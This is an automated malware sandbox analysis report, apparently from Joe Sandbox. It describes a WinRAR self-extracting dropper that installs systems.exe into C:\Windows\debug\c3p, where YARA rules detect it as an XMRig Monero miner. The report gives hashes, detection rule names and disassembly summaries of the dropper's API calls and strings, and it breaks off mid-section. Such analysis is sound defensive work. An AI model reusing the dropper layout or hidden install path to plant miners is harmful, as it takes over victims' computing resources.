Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	14:13:16
Start date:	12/06/2024
Path:	C:\Windows\debug\c3p\systems.exe
Wow64 process (32bit):	false
Commandline:	"C:\WINDOWS\Debug\c3p\systems.exe"
Imagebase:	0x7ff706b90000
File size:	8'251'392 bytes
MD5 hash:	E2FE87CC2C7DAB8CA6516620DCCD1381
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.2581832116.000001A465C15000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.2583101725.00007FF707684000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000000.1358907279.00007FF707684000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000000.1358706937.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000F.00000000.1358706937.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, Author: unknown Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: 0000000F.00000000.1357815445.00007FF706B91000.00000020.00000001.01000000.00000008.sdmp, Author: unknown Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: 0000000F.00000002.2582096108.00007FF706B91000.00000020.00000001.01000000.00000008.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\debug\c3p\systems.exe, Author: Joe Security Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: C:\Windows\debug\c3p\systems.exe, Author: unknown Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Windows\debug\c3p\systems.exe, Author: unknown Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\debug\c3p\systems.exe, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\debug\c3p\systems.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 87%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	15:52:41
Start date:	12/06/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	12.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2%
Total number of Nodes:	2000
Total number of Limit Nodes:	39

Executed Functions

Function 00401CC5 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 769COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00401CCA
_strlen.LIBCMT ref: 0040223B

Part of subcall function 004116C2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,00001FFF,?,?,004022C0,00000000,?,00000800,?,00001FFF,?), ref: 004116DE

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00402397

Strings

CMT, xrefs: 004023BA

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1706572503-2756464174
Opcode ID: 2feb5e0aeadc5ca7cbacf738d6aa850c754736e98c9ef072c0c30c09e793d41b
Instruction ID: 0bdb99cf2f2834eb1d66cf39fda15bef7b84f78c00dedbc0b980d21a0ab13425
Opcode Fuzzy Hash: 2feb5e0aeadc5ca7cbacf738d6aa850c754736e98c9ef072c0c30c09e793d41b
Instruction Fuzzy Hash: B16202319006848FCF25DF64C8997EE7BB1AF14304F08447EE986BB2C6DB795985CB68

Function 004091FE Relevance: 7.6, APIs: 5, Instructions: 111
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,00000800,?,?,?,0040946D,000000FF,?,?,?,?,004081A3,?,?,00000000), ref: 0040922C
FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,0040946D,000000FF,?,?,?,?,004081A3,?,?,00000000), ref: 0040925C
GetLastError.KERNEL32(?,?,00000800,?,0040946D,000000FF,?,?,?,?,004081A3,?,?,00000000,?,00000800), ref: 00409266
FindNextFileW.KERNEL32(000000FF,?,00000800,?,?,?,0040946D,000000FF,?,?,?,?,004081A3,?,?,00000000), ref: 00409290
GetLastError.KERNEL32(?,0040946D,000000FF,?,?,?,?,004081A3,?,?,00000000,?,00000800), ref: 0040929E

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: ee9851f39f08c8d6804640da5d00177b9fd110d66d07a9fe74aee9f42dd749c7
Instruction ID: d66c3d4b50ebb1e5a018f37309fca25f090515eea953c64df4cd569b2ef175e5
Opcode Fuzzy Hash: ee9851f39f08c8d6804640da5d00177b9fd110d66d07a9fe74aee9f42dd749c7
Instruction Fuzzy Hash: 44412F71501658ABCB20DF68CC84ADB77F8EF49350F104AAAF96DE2291D774AAC4CF14

Function 004178F6 Relevance: 2.6, APIs: 1, Instructions: 1055COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00417933

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: f0a80f72d4bda3af986183644c09d2b427bd67fc9bb1789ef1810eb95b7ac04b
Instruction ID: b165ab02d60b62349efe5e82d4abbb2873ee68c43ff350902ee758b64aec6057
Opcode Fuzzy Hash: f0a80f72d4bda3af986183644c09d2b427bd67fc9bb1789ef1810eb95b7ac04b
Instruction Fuzzy Hash: 7C92B6B09087859FCB29CF34C4D06E9BBF1AF55308F18C59ED89A8B342D738A985CB55

Function 0040F277 Relevance: 102.1, APIs: 49, Strings: 9, Instructions: 646
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0040F27C

Strings

winrarsfxmappingfile.tmp, xrefs: 0040F56F
<, xrefs: 0040F592
z(D, xrefs: 0040F539
STARTDLG, xrefs: 0040F294
@, xrefs: 0040F599
"%s"%s, xrefs: 0040F6C2
-el -s2 "-d%s" "-p%s" "-sp%s", xrefs: 0040F556
LICENSEDLG, xrefs: 0040F9D7
__tmp_rar_sfx_access_check_%u, xrefs: 0040F49A

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: H_prolog
String ID: "%s"%s$-el -s2 "-d%s" "-p%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp$z(D
API String ID: 3519838083-1299667913
Opcode ID: 50c944e4c2afe0530948b73b66513e9778a7e67b9b417df9aba9980627aa54f5
Instruction ID: d496d710f2a45ca64884dc54fcd9ade419b820f81efa952dde0f9a3a7b54c10c
Opcode Fuzzy Hash: 50c944e4c2afe0530948b73b66513e9778a7e67b9b417df9aba9980627aa54f5
Instruction Fuzzy Hash: 7322E171540244FFEB31BFA19D85E9E3A68EB05304F40403BFA05B61D1DB7949A9CB6E

Function 0040E541 Relevance: 73.9, APIs: 35, Strings: 7, Instructions: 411
windowfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0040E546

Part of subcall function 0040D472: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0040D520

SetFileAttributesW.KERNEL32(?,00000000,?,00000000,?,?,00000800,?,00000000,75A45540,?,0040F22B,?,00000003), ref: 0040E691
_wcslen.LIBCMT ref: 0040E6CC
_wcslen.LIBCMT ref: 0040E6E1
_wcslen.LIBCMT ref: 0040E707
_memset.LIBCMT ref: 0040E71D
SHFileOperationW.SHELL32 ref: 0040E740
GetFileAttributesW.KERNEL32(?), ref: 0040E74D
DeleteFileW.KERNEL32(?), ref: 0040E75B
_wcscat.LIBCMT ref: 0040E811
_wcslen.LIBCMT ref: 0040E849
_realloc.LIBCMT ref: 0040E85B
_wcscat.LIBCMT ref: 0040E875
SetWindowTextW.USER32(?,?), ref: 0040E8A6
_wcslen.LIBCMT ref: 0040E8EF
_wcscpy.LIBCMT ref: 0040EA0D
_wcsrchr.LIBCMT ref: 0040EA1D
_wcscpy.LIBCMT ref: 0040EA3C
GetDlgItem.USER32(?,00000066), ref: 0040EA55
SetWindowTextW.USER32(00000000,?), ref: 0040EA65
SendMessageW.USER32(00000000,00000143,00000000,%s.%d.tmp), ref: 0040EA74
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0040EAA0

Strings

\, xrefs: 0040E9B5
<br>, xrefs: 0040E80B
%s.%d.tmp, xrefs: 0040E683, 0040E778, 0040EA3B, 0040EA6B, 0040EA81
ProgramFilesDir, xrefs: 0040E967
C:\Windows\debug\c3p, xrefs: 0040E59F
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040E942
", xrefs: 0040E8CB

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: _wcslen$File$AttributesMessageSendTextWindow_wcscat_wcscpy$DeleteEnvironmentExpandH_prologItemOperationStrings_memset_realloc_wcsrchr
String ID: "$%s.%d.tmp$<br>$C:\Windows\debug\c3p$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$\
API String ID: 3339014310-191996915
Opcode ID: 1ecbdf8059d576a3421a046d5446c4f736839f8ebacfa9af43f8436be51fa22c
Instruction ID: b670f3089cf1993bfa594e3b9b93eeee7edc8de7fb1b22754e54a4710f6d7265
Opcode Fuzzy Hash: 1ecbdf8059d576a3421a046d5446c4f736839f8ebacfa9af43f8436be51fa22c
Instruction Fuzzy Hash: 0CF150B1900219ABDF20DBA1DC45FEE7378BB04304F4448BBF615B21D1EB789AA58B59

Function 0040FB3C Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 161
filecomwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410A29: GetModuleHandleW.KERNEL32(kernel32,0040FB4C,00000001), ref: 00410A2E
Part of subcall function 00410A29: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00410A3E

OleInitialize.OLE32(00000000), ref: 0040FB4F

Part of subcall function 00411ADC: GetCPInfo.KERNEL32(00000000,?,?,?,?,0040FB5F), ref: 00411AED
Part of subcall function 00411ADC: IsDBCSLeadByte.KERNEL32(00000000), ref: 00411B01

_memset.LIBCMT ref: 0040FB6B
GetCommandLineW.KERNEL32 ref: 0040FB73
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0040FB99
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007002), ref: 0040FBAB
UnmapViewOfFile.KERNEL32(00000000), ref: 0040FBD4

Part of subcall function 0040D2E8: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0040D301
Part of subcall function 0040D2E8: SetEnvironmentVariableW.KERNEL32(sfxpar,00000002,00000000,00000000,?,?,00000400), ref: 0040D334

CloseHandle.KERNEL32(?), ref: 0040FBDD
GetModuleFileNameW.KERNEL32(00000000,00438820,00000800), ref: 0040FBF7
SetEnvironmentVariableW.KERNELBASE(sfxname,00438820), ref: 0040FC03
GetModuleHandleW.KERNEL32(00000000), ref: 0040FC0A
LoadIconW.USER32 ref: 0040FC21
LoadBitmapW.USER32 ref: 0040FC34
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,0040F277,00000000), ref: 0040FC93
DeleteObject.GDI32 ref: 0040FCF4
DeleteObject.GDI32(?), ref: 0040FD00
CloseHandle.KERNEL32(000000FF), ref: 0040FD3D
Sleep.KERNELBASE(?), ref: 0040FD4D
OleUninitialize.OLE32 ref: 0040FD53

Part of subcall function 0040D33C: CharUpperW.USER32(?,?,?,?,00000400), ref: 0040D39D
Part of subcall function 0040D33C: CharUpperW.USER32(?,?,?,?,?,00000400), ref: 0040D3C4

Strings

winrarsfxmappingfile.tmp, xrefs: 0040FB8D
STARTDLG, xrefs: 0040FC85
sfxname, xrefs: 0040FBFE

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: FileHandle$EnvironmentModuleVariable$CharCloseDeleteLoadObjectUpperView$AddressBitmapByteCommandDialogIconInfoInitializeLeadLineMappingNameOpenParamProcSleepUninitializeUnmap_memset
String ID: STARTDLG$sfxname$winrarsfxmappingfile.tmp
API String ID: 3055076122-2503671248
Opcode ID: 80d8d67f2e6fa4c10a6e294ca0b7efc422330e329f37fa9ff12ea617a8ed5fff
Instruction ID: 07e57f878e52c542eb39bc778af8a53b11ad9cd4a6be2924e4f7471581548559
Opcode Fuzzy Hash: 80d8d67f2e6fa4c10a6e294ca0b7efc422330e329f37fa9ff12ea617a8ed5fff
Instruction Fuzzy Hash: D051D870A01208EFC720BFA1ED89D5E3BA9EB45314B50443FF901A32A1DB785955CBAE

Function 0040B925 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 240
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0040B92A
_wcschr.LIBCMT ref: 0040B941
GetModuleFileNameW.KERNEL32(00000000,?,00000800,004325BC,0040C0A7,0040FC52,00438820,0040FC52,00438820), ref: 0040B95A
_wcsrchr.LIBCMT ref: 0040B969
_wcscpy.LIBCMT ref: 0040B97F
_malloc.LIBCMT ref: 0040BB06

Part of subcall function 00408936: SetFilePointer.KERNELBASE(?,00000000,?,00000001), ref: 00408969
Part of subcall function 00408936: GetLastError.KERNEL32(?,?), ref: 00408976

_strncmp.LIBCMT ref: 0040BA32
_strncmp.LIBCMT ref: 0040BA8E
_malloc.LIBCMT ref: 0040BB3C

Strings

*messages***, xrefs: 0040BA5E
a, xrefs: 0040BA75
*messages***, xrefs: 0040BA2C

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: File_malloc_strncmp$ErrorH_prologLastModuleNamePointer_wcschr_wcscpy_wcsrchr
String ID: *messages***$*messages***$a
API String ID: 644328012-1639468518
Opcode ID: d5bf116093e3753ee3e88e92be552364967f0fdb6f133d7e269eb3e93f4078ed
Instruction ID: 336bd8d6889e5393640b6eb2f395195fd14860236c7930fcd7781f7bd21ec6d8
Opcode Fuzzy Hash: d5bf116093e3753ee3e88e92be552364967f0fdb6f133d7e269eb3e93f4078ed
Instruction Fuzzy Hash: AC81E0B1A002099BDB30DF64CC81BAA77B4EF10350F10417FE695B72D5EB789A84CA9D

Function 0040BE4F Relevance: 21.2, APIs: 14, Instructions: 205
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040BD68: _wcschr.LIBCMT ref: 0040BD98

GetWindowRect.USER32 ref: 0040BE78
GetClientRect.USER32 ref: 0040BE85
GetWindowLongW.USER32(?,000000F0), ref: 0040BF11
SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0040BF35
GetWindowRect.USER32 ref: 0040BF42
GetWindowTextW.USER32(?,?,00000400), ref: 0040BF61
SetWindowTextW.USER32(?,?), ref: 0040BF87
GetSystemMetrics.USER32 ref: 0040BF96
GetWindow.USER32 ref: 0040BFA3
GetWindowTextW.USER32(00000000,?,00000400), ref: 0040BFD0
SetWindowTextW.USER32(00000000,00000000), ref: 0040C000
GetWindowRect.USER32 ref: 0040C013
SetWindowPos.USER32(00000000,00000000,00000000,00000110,00000000,00000110,00000204), ref: 0040C070
GetWindow.USER32 ref: 0040C07B

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: Window$RectText$ClientLongMetricsSystem_wcschr
String ID:
API String ID: 4134264131-0
Opcode ID: 08dc7c77311b924382860ca2428d645387aaf5d18714a7fe9270ec02dbb33203
Instruction ID: b2f518587ff17eba686361831e3fb2fb58f6033ecb525b18cd3b9a79a0b47dd9
Opcode Fuzzy Hash: 08dc7c77311b924382860ca2428d645387aaf5d18714a7fe9270ec02dbb33203
Instruction Fuzzy Hash: 99711971A00219AFDF10DFE8CC89AEEBBB9FB08314F048129F915F61A0D7759A55CB94

Function 0040CF89 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 94
windowCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(00000068,00000000), ref: 0040CF9A
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040D0D7,00000001,?,?,0040DFB7,0042A830,0044BF30,0044BF30,00001000), ref: 0040CFC7
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0040CFD3
SendMessageW.USER32(00000000,000000C2,00000000,0042A724), ref: 0040CFE2
SendMessageW.USER32(004012F5,000000B1,05F5E100,05F5E100), ref: 0040CFF6
SendMessageW.USER32(004012F5,0000043A,00000000,?), ref: 0040D00D
SendMessageW.USER32(004012F5,00000444,00000001,0000005C), ref: 0040D048
SendMessageW.USER32(004012F5,000000C2,00000000,00000456), ref: 0040D057
SendMessageW.USER32(004012F5,000000B1,05F5E100,05F5E100), ref: 0040D05F
SendMessageW.USER32(004012F5,00000444,00000001,0000005C), ref: 0040D083
SendMessageW.USER32(004012F5,000000C2,00000000,0042A7F8), ref: 0040D094

Part of subcall function 00418D09: DestroyWindow.USER32(?,75A45540,0040CFC4,?,?,?,?,?,0040D0D7,00000001,?,?,0040DFB7,0042A830,0044BF30,0044BF30), ref: 00418D14

Strings

\, xrefs: 0040D006

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: MessageSend$Window$DestroyItemShow
String ID: \
API String ID: 2996232536-2967466578
Opcode ID: f27d4aafb9b25e16021a5c4da7230885d79aaadc79dcf51b93068843b2094804
Instruction ID: 3bcfa04be87af39d439265c1cb0a45e1241d1bec1e9ff4188d2f9aa136dbdd9b
Opcode Fuzzy Hash: f27d4aafb9b25e16021a5c4da7230885d79aaadc79dcf51b93068843b2094804
Instruction Fuzzy Hash: 0B31C270E4025CBEEB219B90CC4AFAE7FB9EB41714F104129F604BA1D0D7B50D11DB95

Function 0040E156 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 174
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 0040E173
_memset.LIBCMT ref: 0040E18E
ShellExecuteExW.SHELL32(?), ref: 0040E284
IsWindowVisible.USER32(?), ref: 0040E2BD
ShowWindow.USER32(?,00000000), ref: 0040E2CB
WaitForInputIdle.USER32 ref: 0040E2D9
GetExitCodeProcess.KERNEL32(?,?), ref: 0040E2F6
CloseHandle.KERNEL32(?), ref: 0040E315
ShowWindow.USER32(?,00000001), ref: 0040E36E

Strings

.inf, xrefs: 0040E241
.exe, xrefs: 0040E320

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_memset_wcslen
String ID: .exe$.inf
API String ID: 3215649069-3750412487
Opcode ID: 299c0dbc75963e7897f8c70525011216fe4c7ea437754cab6388a9e856f4c11f
Instruction ID: 2426b1d0564d678c393ad43d70cca87e94956e82958ae559a835b2815eadd3ba
Opcode Fuzzy Hash: 299c0dbc75963e7897f8c70525011216fe4c7ea437754cab6388a9e856f4c11f
Instruction Fuzzy Hash: 1D519471901258AADF31ABA2D8405AF7FB8AF01300F084C7FE941B72E1D77989B5DB49

Function 00419BDE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 30
librarycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(riched32.dll,00000000,00438820,?,?,?,0040FC47), ref: 00419BF9
LoadLibraryW.KERNEL32(riched20.dll,?,0040FC47), ref: 00419C02
OleInitialize.OLE32(00000000), ref: 00419C09
InitCommonControlsEx.COMCTL32(?), ref: 00419C21
SHGetMalloc.SHELL32(0044E800), ref: 00419C2C

Strings

riched32.dll, xrefs: 00419BF4
riched20.dll, xrefs: 00419BFB

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

